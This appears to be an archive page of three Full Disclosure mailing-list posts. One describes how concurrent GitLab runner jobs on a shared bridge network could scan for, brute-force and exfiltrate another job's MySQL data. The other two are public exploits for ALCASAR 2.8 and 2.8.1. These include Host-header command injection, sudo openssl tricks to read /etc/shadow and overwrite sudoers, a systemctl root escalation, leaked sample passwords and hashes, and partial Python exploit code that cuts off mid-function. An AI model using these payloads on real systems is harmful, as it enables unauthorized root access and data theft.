[FD] Some interesting facts about gitlab runners

2019-08-13 Thread John Doe 
So generally when you create a docker container, you specify what network
you want to create it on right? Well due to historical reasons if you don't
the container is created on the default "bridge0" network.

This network doesn't have service discovery in the proper sense. To have
containers talk to each other by name you need to "link" them, in the
legacy docker sense. But in fact it's possible for any container on this
network, to communicate with any other container on this network, over any
port, whether the containers are linked or not. Sure you need to guess the
IP address but you only have 255 to choose from so it's not that difficult.

The fun fact is that gitlab runners are actually using this bridge0
network. You'd think that each job would create its own network for it and
its services, but as of right now gitlab uses docker's legacy "link"
functionality. Which allows sharing environment variables easily, but
forces them to use the bridge0 network. Using a network per job is actually
one of the many many gitlab TODOs. See here:

https://gitlab.com/gitlab-org/gitlab-runner/issues/1042

Looks like this one was recently backlogged! Oops!

So this means that jobs on a gitlab runner can communicate over the network
with any other job concurrently running on the same gitlab runner. But wait
gitlab jobs don't listen over the network generally right? Well gitlab
services do! https://docs.gitlab.com/ee/ci/services/

Take the following scenario. Alice is running a CI job in a shared gitlab
runner from some place that provides hosted gitlab or something. This job
does the following and is a very common use case:
* Starts a mysql service with the password "p4ssw0rd" (she figures she
doesn't need to use a secure password because it's just a job running
internally, at least mysql's docker image will make you put a password on
your service container unlike redis for instance)
* Downloads a copy of her company's production database from the cache
* Restores it to the mysql service of the gitlab job
* Runs unit tests against it

Meanwhile Bob, who is not an employee at Alice's company creates a gitlab
job that does the following:
* Uses a port scanner to see if there's any containers listening on port
3306 in the IP range of the bridge0 network they're connected to
* If there are attempts to mysql connect to them using username root and a
table of common passwords. Remember the IP of the user isn't restricted
since Bob's IP range is the same as Alice's
* If it's able to connect, do mysqldump | aws s3 cp or something to stream
Alice's internal company data to Bob's S3 compatible storage

If Bob's gitlab job ends up running on the same server as Alice's then
he'll be able to steal her company data.

IMPORTANT NOTES:

gitlab.com is NOT vulnerable, because their shared runners only run one
concurrent job, so Bob's gitlab job will never end up running on the same
server as Alice's.

Your company is probably not vulnerable, because everyone with access to
your internal gitlab goes out to lunch together and gives each other hugs
when they're feeling down and is totally trustworthy.

If you're using some shared runner that allows multiple concurrent jobs
potentially from people you don't trust, and the services in your gitlab
jobs don't require authentication to connect to them, you should probably
stop doing that.

MITIGATION:

Do one or more of the following:

* Don't share gitlab runners with strangers. You should host your own
gitlab runners.
* Use concurrency=1 for your gitlab runners, which is the default, so that
they can only run one job at a time.
* Make sure any gitlab services you use utilize authentication with strong
passwords.

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] ALCASAR = 2.8.1 Remote Root Code Execution Vulnerability

2014-09-15 Thread john doe 
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#

#
#ALCASAR = 2.8.1 Remote Root Code Execution Vulnerability
#
#Author: eF
#Date  : 2014-09-12
#URL   : http://www.alcasar.net/
#
#This is not a responsible disclosure coz' I have no sense of ethics and I 
don't give a f*ck.
#
#db 88   ,adba, db ad8ba
 db ba
#   d88b88  d8'`8b   d88b   d8 8b   
d88b88  8b
#  d8'`8b   88 d8'd8'`8b  Y8,  
d8'`8b   88  ,8P
# d8'  `8b  88 88d8'  `8b `Y8a,   
d8'  `8b  88aa8P'
#d8YY8b 88 88   d8YY8b  `8b,
d8YY8b '
#   d88b88 Y8, d88b   `8b   
d88b88`8b
#  d8'`8b   88  Y8a..a8P  d8'`8b  Y8a a8P  d8'  
  `8b   88 `8b
# d8'  `8b  888  `YY'  d8'  `8b  Y8P  d8'   
   `8b  88  `8b
#
#
# ALCASAR is a free Network Access Controller which controls the Internet 
consultation networks. 
# It authenticates, attributes and protects users' access regardless their 
connected equipment 
# (PC, smartphone, game console, etc.).
#
# I recently released an exploit for ALCASAR 2.8 (ALCASAR = 2.8 Remote Code 
Execution Vulnerability Root).
# As a reminder, it was a trivial code execution via a unfiltered exec() call:
#
#   $pattern = preg_replace('/www./','',$_SERVER['HTTP_HOST']);
#   exec(grep -Re ^$pattern$ /etc/dansguardian/lists/blacklists/*/domains|cut 
-d'/' -f6, $output);
#
# A few days later, a new version corrects the vulnerability. Or maybe not...
#
# At first, this is how ALCASAR's developers present the previous vulnerability:
# 
#  A security hole has been discovered on ALCASAR V2.8 (only this version). 
This vulnerability allows a user 
#  connected on the LAN to retrieve a lot of data from the server. The ALCASAR 
team is testing few security  
#  patches. A script that you could run on the active servers will be 
available on this forum ASAP. At that  
#  time, the download version of ALCASAR will be incremented (V2.8.1) 
#
# ?!? This vulnerability allows a user connected on the LAN to *TOTALLY PWN* 
the server:
# Get a root shell, stop all services, sniff all connections, inject data in 
users' sessions, sniff passwords,
# bypass firewall rules, act as another user, etc.
# This is not just a matter of retrieving a lot of data from the server.
#
# Not to alert users of real criticality of a vulnerability is a very serious 
lack of security.
# Lying by saying that the vulnerability only affects version 2.8 while it also 
affects version 2.7 is another
# one.
#
# Now, the patch itself: it tries to correct the vulnerability by filtering the 
vulnerable input:
#
# $pattern = filter_var($pattern, FILTER_VALIDATE_URL) == false ?  : $pattern;
#
# WTF?!
# First, I think that the application no longer works. By default, filter_var() 
is going to accept an URL
# only if its scheme is valid:
#
#   $ php -r 'var_dump(filter_var(www.google.com, FILTER_VALIDATE_URL));'
# bool(false)
#   $ php -r 'var_dump(filter_var(http://www.google.com;, 
FILTER_VALIDATE_URL));'
# string(21) http://www.google.com;
#
# But... we cannot put http:// in the HTTP host field, the HTTP server won't 
let us...
# Dev, did you try your patch?
# Instead, to execute code, it's quite easy to bypass this filtering using 
mailto:em...@valid.tld;cmd;;
# Service down, vulnerability still present: double fail.
#
# The privilege escalation in the previous exploit was using openssl, to gain 
reading and writing rights
# as root.
#
# The patch therefore removes openssl in the sudoers file (without changing the 
legitimate
# calls in the PHP code...). So let's use another method: systemctl is still 
callable via sudo...
#
# We can create a service with our command and start it as root:
#
# sudo systemctl link /tmp/pwn3d.service
# sudo systemctl start pwn3d.service
#
# Conclusion: triple fail.
#
# Wouldn't a responsable de la sécurité des systèmes d'information d'un grand 
commandement need a 
# little training on secure PHP development?
#
# On ALCASAR website:
#
# The security of the portal has been worked out like a bastion in order to 
resist to different
# kinds of threat
#
# LOLZ!!! Remote Root Code Execution does not seem to be part of these 
different kinds of threat.
#
# ALCASAR is not built with security in mind. Apache user can sudo, there is no 
chroot, no separation,
# the PHP code is dreadful, some passwords are unnecessarily stored in 
plaintext, the function to 
# generate user password is weak, there are no system updates (kernel is out to 
date, from Jul 4 2013),
# etc.
#
# Development is not really open either: there is no bugtracker, no trac, no 
way to see what has been 
# patched, etc. If the elementary rules of open source

[FD] ALCASAR = 2.8 Remote Root Code Execution Vulnerability

2014-09-07 Thread john doe 
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#

#
#ALCASAR = 2.8 Remote Root Code Execution Vulnerability
#
#Author: eF
#Date  : 2014-02-10
#
#
#db 88   ,adba, db ad8ba
 db ba
#   d88b88  d8'`8b   d88b   d8 8b   
d88b88  8b
#  d8'`8b   88 d8'd8'`8b  Y8,  
d8'`8b   88  ,8P
# d8'  `8b  88 88d8'  `8b `Y8a,   
d8'  `8b  88aa8P'
#d8YY8b 88 88   d8YY8b  `8b,
d8YY8b '
#   d88b88 Y8, d88b   `8b   
d88b88`8b
#  d8'`8b   88  Y8a..a8P  d8'`8b  Y8a a8P  d8'  
  `8b   88 `8b
# d8'  `8b  888  `YY'  d8'  `8b  Y8P  d8'   
   `8b  88  `8b
#
#
# ALCASAR is a free Network Access Controller which controls the Internet 
# consultation networks. It authenticates, attributes and protects users'
# access regardless their connected equipment (PC, smartphone, game console,
# etc.).
#
#
# ALCASAR Web UI, accessible by any unauthenticated user, suffers from a 
# trivial vulnerability. In the index.php file:
#
#   $pattern = preg_replace('/www./','',$_SERVER['HTTP_HOST']);
#   exec(grep -Re ^$pattern$ /etc/dansguardian/lists/blacklists/*/domains|cut 
-d'/' -f6, $output);
#
# By sending a specially crafted value in the host HTTP header, it is possible
# to inject the exec() function in order to execute commands as Apache user.
# 
# In addition, the Apache user is able to call sudo for these binaries:
# 
# 
/sbin/ip,/sbin/arping,/sbin/arp,/usr/sbin/arpscan,/usr/sbin/tcpdump,/usr/local/bin/alcasar-watchdog.sh,/usr/local/sbin/alcasar-dhcp.sh
# /usr/local/bin/alcasar-conf.sh
# /usr/local/sbin/alcasar-mysql.sh
# 
/usr/local/sbin/alcasar-bl.sh,/usr/local/sbin/alcasar-havp.sh,/usr/local/bin/alcasar-file-clean.sh,/usr/local/sbin/alcasar-url_filter.sh
# 
/usr/local/sbin/alcasar-nf.sh,/usr/local/bin/alcasar-iptables.sh,/usr/sbin/ipset
 
# /usr/local/bin/alcasar-archive.sh
# /usr/bin/radwho,/usr/sbin/chilli_query
# /usr/local/sbin/alcasar-logout.sh
# /sbin/service,/usr/bin/killall,/sbin/chkconfig,/bin/systemctl
# /usr/bin/openssl
# 
# As a result, we can use /usr/bin/openssl to read a file as root:
# 
#   sudo /usr/bin/openssl base64 -in /etc/shadow -A | base64 -d
# 
# Or to create or overwrite files as root (create a cron job, edit 
/etc/sudoers, etc.):
#
#   echo cHduZWQK | sudo /usr/bin/openssl base64 -d -out /etc/cron.d/pwned
#
# In this exploit, I choose to modify the sudoers file.
# 
# Note: this vulnerability has been discovered in less than 30 seconds.
# Others vulnerabilities are still present. This code has never been audited...
# The PHP code is dreadful and needs to be rewritten from scratch.
#
# Example (post-auth) in file acc/admin/activity.php:
#
#   if (isset($_POST['action'])){
#   switch ($_POST['action']){
#case 'user_disconnect' :
#   exec (sudo /usr/sbin/chilli_query logout $_POST[mac_addr]);
#
#
# This is not a responsible disclosure coz' I have no sense of ethics and I 
couldn't care less.
#
#
# % python alcasar-2.8_rce.py alcasar.localdomain alcasar-version.sh
#
# [+] Hello, first here are some passwords for you:
# Password to protect the boot menu (GRUB) : cV9eEz1g
# Name and password of Mysql/mariadb administrator : root / FvYPr7b3
# Name and password of Mysql/mariadb user : radius / oRNln64j
# Shared secret between the script 'intercept.php' and coova-chilli : b9Rj34jz
# Shared secret between coova-chilli and FreeRadius : 7tIrnkJu
#
# 
root:$2a$08$Aw4yIxQIUJ0taDjiXKSRYu6zZB5eUcbZ4445vo1157AdeGSfe1XuC:16319:0:9:7:::
#
# [...]
#
# admin:alcasar.localdomain:49b8642b4646a4afa38cda065f76ce0e
#
# usernamevalue
# user$1$passwd$qr0Ajhr12fZ475a2qAZ.H.
#
# [-] whoami (should be apache):
# uid=495(apache) gid=492(apache) groups=492(apache)
#
# [+] On the way to the uid 0...
# [-] Got root?
# uid=0(root) gid=0(root) groups=0(root)
#
# [+] Your command Sir:
# The Running version (2.8) is up to date
#
#


import sys, os, re, httplib

class PWN_Alcasar:

def __init__(self, host):
self.host = host
self.root = False

def exec_cmd(self, cmd, output=False):
tag = os.urandom(4).encode('hex')

cmd = 'bash -c %s 21' % cmd.replace('', '\\')
if self.root:
cmd = 'sudo %s' % cmd

headers = {
'host' : 'aAaAa index.php;echo %s;echo %s|base64 -d -w0|sh|base64 
-w0;#' % (tag, cmd.encode('base64').replace('\n',''))
}

c = httplib.HTTPConnection(self.host)
c.request('GET', '/index.php', '', headers)
r = c.getresponse()
data = r.read()
c.close()

if data.find(tag) != -1:
m = re.search(r'%s, (.*)\s/div' % tag, data)
if m: